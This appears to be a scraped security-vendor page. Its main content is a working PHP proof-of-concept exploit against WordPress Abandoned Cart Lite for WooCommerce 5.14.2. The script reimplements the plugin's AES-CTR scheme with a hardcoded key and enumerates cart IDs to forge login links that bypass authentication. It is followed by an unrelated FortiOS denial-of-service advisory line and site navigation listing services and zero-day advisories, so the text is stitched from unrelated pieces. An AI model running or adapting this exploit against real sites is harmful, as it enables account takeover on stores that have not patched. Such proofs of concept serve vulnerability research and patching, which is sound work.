for ( $r = 1; $r < 4; $r++ ) {            for ( $c = 0; $c < 4;            $c++ ) {                $t[ $c ] = $s[ $r ][ ( $c + $r ) % $Nb ]; // shift into temp copy            }            for ( $c = 0; $c < 4;            $c++ ) {                $s[ $r ][ $c ] = $t[ $c ]; // and copy back            }        } // note that this will work for Nb=4,5,6, but not 7,8 (always 4 for AES):        return $s; // see fp.gladman.plus.com/cryptography_technology/rijndael/aes.spec.311.pdf    }    /**     * Combine bytes of each col of state S [�5.1.3].     *     * @since 2.8     */    private static function mixColumns( $s, $Nb ) {        for ( $c = 0; $c < 4; $c++ ) {            $a = array( 4 ); // 'a' is a copy of the current column from 's'            $b = array( 4 ); // 'b' is a�{02} in GF(2^8)            for ( $i = 0; $i < 4; $i++ ) {                $a[ $i ] = $s[ $i ][ $c ];                $b[ $i ] = $s[ $i ][ $c ] & 0x80 ? $s[ $i ][ $c ] << 1 ^ 0x011b : $s[ $i ][ $c ] << 1;            }            // a[n] ^ b[n] is a�{03} in GF(2^8)            $s[0][ $c ] = $b[0] ^ $a[1] ^ $b[1] ^ $a[2] ^ $a[3]; // 2*a0 + 3*a1 + a2 + a3            $s[1][ $c ] = $a[0] ^ $b[1] ^ $a[2] ^ $b[2] ^ $a[3]; // a0 * 2*a1 + 3*a2 + a3            $s[2][ $c ] = $a[0] ^ $a[1] ^ $b[2] ^ $a[3] ^ $b[3]; // a0 + a1 + 2*a2 + 3*a3            $s[3][ $c ] = $a[0] ^ $b[0] ^ $a[1] ^ $a[2] ^ $b[3]; // 3*a0 + a1 + a2 + 2*a3        }        return $s;    }    /**     * Generate Key Schedule from Cipher Key [�5.2].     *     * Perform key expansion on cipher key to generate a key schedule.     *     * @param  key cipher key byte-array (16 bytes).     * @return key schedule as 2D byte-array (Nr+1 x Nb bytes).     * @since 2.8     */    public static function keyExpansion( $key ) {        $Nb = 4; // block size (in words): no of columns in state (fixed at 4 for AES)        $Nk = count( $key ) / 4; // key length (in words): 4/6/8 for 128/192/256-bit keys        $Nr = $Nk + 6; // no of rounds: 10/12/14 for 128/192/256-bit keys        $w    = array();        $temp = array();        for ( $i = 0; $i < $Nk; $i++ ) {            $r       = array( $key[ 4 * $i ], $key[ 4 * $i + 1 ], $key[ 4 * $i + 2 ], $key[ 4 * $i + 3 ] );            $w[ $i ] = $r;        }        for ( $i = $Nk; $i < ( $Nb * ( $Nr + 1 ) ); $i++ ) {            $w[ $i ] = array();            for ( $t = 0; $t < 4;            $t++ ) {                $temp[ $t ] = $w[ $i - 1 ][ $t ];            }            if ( $i % $Nk == 0 ) {                $temp = self::subWord( self::rotWord( $temp ) );                for ( $t = 0; $t < 4;                $t++ ) {                    $temp[ $t ] ^= self::$rCon[ $i / $Nk ][ $t ];                }            } elseif ( $Nk > 6 && $i % $Nk == 4 ) {                $temp = self::subWord( $temp );            }            for ( $t = 0; $t < 4;            $t++ ) {                $w[ $i ][ $t ] = $w[ $i - $Nk ][ $t ] ^ $temp[ $t ];            }        }        return $w;    }    /**     * Apply SBox to 4-byte word w.     *     * @since 2.8     */    private static function subWord( $w ) {        for ( $i = 0; $i < 4;        $i++ ) {            $w[ $i ] = self::$sBox[ $w[ $i ] ];        }        return $w;    }    /**     * Rotate 4-byte word w left by one byte.     *     * @since 2.8     */    private static function rotWord( $w ) {        $tmp = $w[0];        for ( $i = 0; $i < 3;        $i++ ) {            $w[ $i ] = $w[ $i + 1 ];        }        $w[3] = $tmp;        return $w;    }    // sBox is pre-computed multiplicative inverse in GF(2^8) used in subBytes and keyExpansion [�5.1.1]    private static $sBox = array(        0x63,        0x7c,        0x77,        0x7b,        0xf2,        0x6b,        0x6f,        0xc5,        0x30,        0x01,        0x67,        0x2b,        0xfe,        0xd7,        0xab,        0x76,        0xca,        0x82,        0xc9,        0x7d,        0xfa,        0x59,        0x47,        0xf0,        0xad,        0xd4,        0xa2,        0xaf,        0x9c,        0xa4,        0x72,        0xc0,        0xb7,        0xfd,        0x93,        0x26,        0x36,        0x3f,        0xf7,        0xcc,        0x34,        0xa5,        0xe5,        0xf1,        0x71,        0xd8,        0x31,        0x15,        0x04,        0xc7,        0x23,        0xc3,        0x18,        0x96,        0x05,        0x9a,        0x07,        0x12,        0x80,        0xe2,        0xeb,        0x27,        0xb2,        0x75,        0x09,        0x83,        0x2c,        0x1a,        0x1b,        0x6e,        0x5a,        0xa0,        0x52,        0x3b,        0xd6,        0xb3,        0x29,        0xe3,        0x2f,        0x84,        0x53,        0xd1,        0x00,        0xed,        0x20,        0xfc,        0xb1,        0x5b,        0x6a,        0xcb,        0xbe,        0x39,        0x4a,        0x4c,        0x58,        0xcf,        0xd0,        0xef,        0xaa,        0xfb,        0x43,        0x4d,        0x33,        0x85,        0x45,        0xf9,        0x02,        0x7f,        0x50,        0x3c,        0x9f,        0xa8,        0x51,        0xa3,        0x40,        0x8f,        0x92,        0x9d,        0x38,        0xf5,        0xbc,        0xb6,        0xda,        0x21,        0x10,        0xff,        0xf3,        0xd2,        0xcd,        0x0c,        0x13,        0xec,        0x5f,        0x97,        0x44,        0x17,        0xc4,        0xa7,        0x7e,        0x3d,        0x64,        0x5d,        0x19,        0x73,        0x60,        0x81,        0x4f,        0xdc,        0x22,        0x2a,        0x90,        0x88,        0x46,        0xee,        0xb8,        0x14,        0xde,        0x5e,        0x0b,        0xdb,        0xe0,        0x32,        0x3a,        0x0a,        0x49,        0x06,        0x24,        0x5c,        0xc2,        0xd3,        0xac,        0x62,        0x91,        0x95,        0xe4,        0x79,        0xe7,        0xc8,        0x37,        0x6d,        0x8d,        0xd5,        0x4e,        0xa9,        0x6c,        0x56,        0xf4,        0xea,        0x65,        0x7a,        0xae,        0x08,        0xba,        0x78,        0x25,        0x2e,        0x1c,        0xa6,        0xb4,        0xc6,        0xe8,        0xdd,        0x74,        0x1f,        0x4b,        0xbd,        0x8b,        0x8a,        0x70,        0x3e,        0xb5,        0x66,        0x48,        0x03,        0xf6,        0x0e,        0x61,        0x35,        0x57,        0xb9,        0x86,        0xc1,        0x1d,        0x9e,        0xe1,        0xf8,        0x98,        0x11,        0x69,        0xd9,        0x8e,        0x94,        0x9b,        0x1e,        0x87,        0xe9,        0xce,        0x55,        0x28,        0xdf,        0x8c,        0xa1,        0x89,        0x0d,        0xbf,        0xe6,        0x42,        0x68,        0x41,        0x99,        0x2d,        0x0f,        0xb0,        0x54,        0xbb,        0x16,    );    // rCon is Round Constant used for the Key Expansion [1st col is 2^(r-1) in GF(2^8)] [�5.2]    private static $rCon = array(        array( 0x00, 0x00, 0x00, 0x00 ),        array( 0x01, 0x00, 0x00, 0x00 ),        array( 0x02, 0x00, 0x00, 0x00 ),        array( 0x04, 0x00, 0x00, 0x00 ),        array( 0x08, 0x00, 0x00, 0x00 ),        array( 0x10, 0x00, 0x00, 0x00 ),        array( 0x20, 0x00, 0x00, 0x00 ),        array( 0x40, 0x00, 0x00, 0x00 ),        array( 0x80, 0x00, 0x00, 0x00 ),        array( 0x1b, 0x00, 0x00, 0x00 ),        array( 0x36, 0x00, 0x00, 0x00 ),    );}function urs( $a, $b ) {        $a  = intval( $a ) & 0xffffffff;        $b &= 0x1f; // (bounds check)        if ( $a & 0x80000000 && $b > 0 ) { // if left-most bit set.            $a     = ( $a >> 1 ) & 0x7fffffff; // right-shift one bit & clear left-most bit.            $check = $b - 1;            $a     = $a >> ( $check ); // remaining right-shifts.        } else { // otherwise.            $a = ( $a >> $b ); // use normal right-shift.        }        return $a;    }   function encrypt( $plaintext, $password, $nBits ) {        $blockSize = 16; // block size fixed at 16 bytes / 128 bits (Nb=4) for AES        if ( ! ( $nBits == 128 || $nBits == 192 || $nBits == 256 ) ) {            return ''; // standard allows 128/192/256 bit keys        }        // note PHP (5) gives us plaintext and password in UTF8 encoding!        // use AES itself to encrypt password to get cipher key (using plain password as source for        // key expansion) - gives us well encrypted key        $nBytes  = $nBits / 8; // no bytes in key        $pwBytes = array();        for ( $i = 0; $i < $nBytes;        $i++ ) {            $pwBytes[ $i ] = ord( substr( $password, $i, 1 ) ) & 0xff;        }        $key = Wcal_Aes::cipher( $pwBytes, Wcal_Aes::keyExpansion( $pwBytes ) );        $key = array_merge( $key, array_slice( $key, 0, $nBytes - 16 ) ); // expand key to 16/24/32 bytes long        // initialise 1st 8 bytes of counter block with nonce (NIST SP800-38A �B.2): [0-1] = millisec,        // [2-3] = random, [4-7] = seconds, giving guaranteed sub-ms uniqueness up to Feb 2106        $counterBlock = array();        $nonce        = floor( microtime( true ) * 1000 ); // timestamp: milliseconds since 1-Jan-1970        $nonceMs      = $nonce % 1000;        $nonceSec     = floor( $nonce / 1000 );        $nonceRnd     = floor( rand( 0, 0xffff ) );        for ( $i = 0; $i < 2;        $i++ ) {            $counterBlock[ $i ] = urs( $nonceMs, $i * 8 ) & 0xff;        }        for ( $i = 0; $i < 2;        $i++ ) {            $counterBlock[ $i + 2 ] = urs( $nonceRnd, $i * 8 ) & 0xff;        }        for ( $i = 0; $i < 4;        $i++ ) {            $counterBlock[ $i + 4 ] = urs( $nonceSec, $i * 8 ) & 0xff;        }        // and convert it to a string to go on the front of the ciphertext        $ctrTxt = '';        for ( $i = 0; $i < 8;        $i++ ) {            $ctrTxt .= chr( $counterBlock[ $i ] );        }        // generate key schedule - an expansion of the key into distinct Key Rounds for each round        $keySchedule = Wcal_Aes::keyExpansion( $key );        // print_r($keySchedule);        $blockCount = ceil( strlen( $plaintext ) / $blockSize );        $ciphertxt  = array(); // ciphertext as array of strings        for ( $b = 0; $b < $blockCount; $b++ ) {            // set counter (block #) in last 8 bytes of counter block (leaving nonce in 1st 8 bytes)            // done in two stages for 32-bit ops: using two words allows us to go past 2^32 blocks (68GB)            for ( $c = 0; $c < 4;            $c++ ) {                $counterBlock[ 15 - $c ] = urs( $b, $c * 8 ) & 0xff;            }            for ( $c = 0; $c < 4;            $c++ ) {                $counterBlock[ 15 - $c - 4 ] = urs( $b / 0x100000000, $c * 8 );            }            $cipherCntr = Wcal_Aes::cipher( $counterBlock, $keySchedule ); // -- encrypt counter block --            // block size is reduced on final block            $blockLength = $b < $blockCount - 1 ? $blockSize : ( strlen( $plaintext ) - 1 ) % $blockSize + 1;            $cipherByte  = array();            for ( $i = 0; $i < $blockLength; $i++ ) { // -- xor plaintext with ciphered counter byte-by-byte --                $cipherByte[ $i ] = $cipherCntr[ $i ] ^ ord( substr( $plaintext, $b * $blockSize + $i, 1 ) );                $cipherByte[ $i ] = chr( $cipherByte[ $i ] );            }            $ciphertxt[ $b ] = implode( '', $cipherByte ); // escape troublesome characters in ciphertext        }        // implode is more efficient than repeated string concatenation        $ciphertext = $ctrTxt . implode( '', $ciphertxt );        $ciphertext = base64_encode( $ciphertext );        return $ciphertext;    }/*******************************************************************************/function fetch_url_content($url) {    $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // Follow redirects    curl_setopt($ch, CURLOPT_HEADER, true);    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);    $output = curl_exec($ch);    if (curl_errno($ch)) {        echo '[-] Error:' . curl_error($ch)."\n";        return False;    }    // Get the status code    $statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);    // Get header size    $headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);    // Separate the headers from the output    $header = substr($output, 0, $headerSize);    $body = substr($output, $headerSize);    curl_close($ch);        // Return headers, body and status code    return [        'header' => $header,        'body' => $body,        'status_code' => $statusCode    ];}if ($argc != 4) {    echo "[-] Usage: php poc.php http://target_host target_port max_cart_id_to_enumerate\n";    exit(1);}$host = $argv[1];$port = $argv[2];// The maximum cart ID to enumerate$max_id = intval($argv[3]);function exploit_link($host,$port,$id,$encryption_key){    $validate_val = $id.'&url='.$host.':'.$port.'/checkout/';    $encrypted_val = encrypt($validate_val, $encryption_key, 256);    $url = $host.':'.$port.'/?wcal_action=checkout_link&user_email=test&validate='.$encrypted_val;    $result = fetch_url_content($url);    if ($result == False){        return False;    }        if ($result['body'] == 'Link expired') {        return False;    } else {        // Looking for username        preg_match('/Set-Cookie:.*wordpress_.*=(.*?)%/', $result['header'], $matches);        $username = isset($matches[1]) ? $matches[1] : null;        if ($username){            echo "[+] Authentication Bypass URL for user '".$username."' : ".$url."\n";            return True;        }else{            return False;        }            }}for ($id = 1; $id <= $max_id; $id++) {    echo "[*] Enumerating cart ID : ".$id."\n";    // Hardcoded Encryption key    $encryption_key = 'qJB0rGtIn5UB1xG03efyCp';    $res = exploit_link($host,$port,$id,$encryption_key);    if (! $res){        // In the docker instance I tried, it had empty encryption key for somereason        $encryption_key = '';        $res = exploit_link($host,$port,$id,$encryption_key);    }}?>

WordPress Abandoned Cart Lite For WooCommerce 5.14.2 Authentication Bypass

A null pointer dereference in Fortinet FortiOS before 7.2.5 and before 7.0.11, FortiProxy before 7.2.3 and before 7.0.9 allows attacker to denial of sslvpn service via specifically crafted request in network parameter.

**Services**

*   Network
    
*   Application
    
*   Files and Endpoint
    
*   Additional SOC Services
    

Select one for more for detail:

*   Anti-recon and Exploit
    
*   Botnet Domain Reputation DB
    
*   Data Loss Prevention
    
*   Indicators of Compromise
    
*   Intrusion Protection
    
*   IP Reputation/Anti-Botnet
    
*   Internet Services
    
*   Secure DNS
    

*   Application Control
    
*   Web Application Security (FADC)
    
*   Client Application Firewall
    
*   Web Application Security (FWB)
    
*   Industrial Security Services
    
*   IOT Application
    
*   Web Filtering
    

*   AntiVirus
    
*   IoT Detection
    
*   Endpoint Detection and Response
    
*   Endpoint Vulnerability
    
*   Mobile Services
    
*   Sandbox Engine
    

*   FortiTester IPS Attack Def
    
*   FortiTester ATT&CK DB Ver
    
*   FortiNDR
    
*   Outbreak Detection Service
    
*   Pen Testing service
    
*   Security Rating Services
    
*   Outbreak deception Service
    

**Zero-day Research**

*   FG-VD-23-002 (Microsoft)  
    Discovered: Feb 14, 2023  
    Released: Apr 11, 2023
    
*   FG-VD-22-102 (InHand Networks)  
    Discovered: Jun 27, 2022  
    Released: Mar 15, 2023
    
*   FG-VD-22-103 (InHand Networks)  
    Discovered: Jun 24, 2022  
    Released: Mar 15, 2023
    
*   FG-VD-22-104 (InHand Networks)  
    Discovered: Jun 23, 2022  
    Released: Mar 15, 2023
    
*   FG-VD-22-107 (InHand Networks)  
    Discovered: Jun 02, 2022  
    Released: Mar 14, 2023
    
*   FG-VD-22-108 (InHand Networks)  
    Discovered: Jun 24, 2022  
    Released: Mar 14, 2023
    
*   FG-VD-22-109 (InHand Networks)  
    Discovered: Jun 24, 2022  
    Released: Mar 14, 2023
    
*   FG-VD-22-101 (InHand Networks)  
    Discovered: Jun 03, 2022  
    Released: Mar 14, 2023
    
*   See More Advisories
    

**Certifications**

Tag

#ssl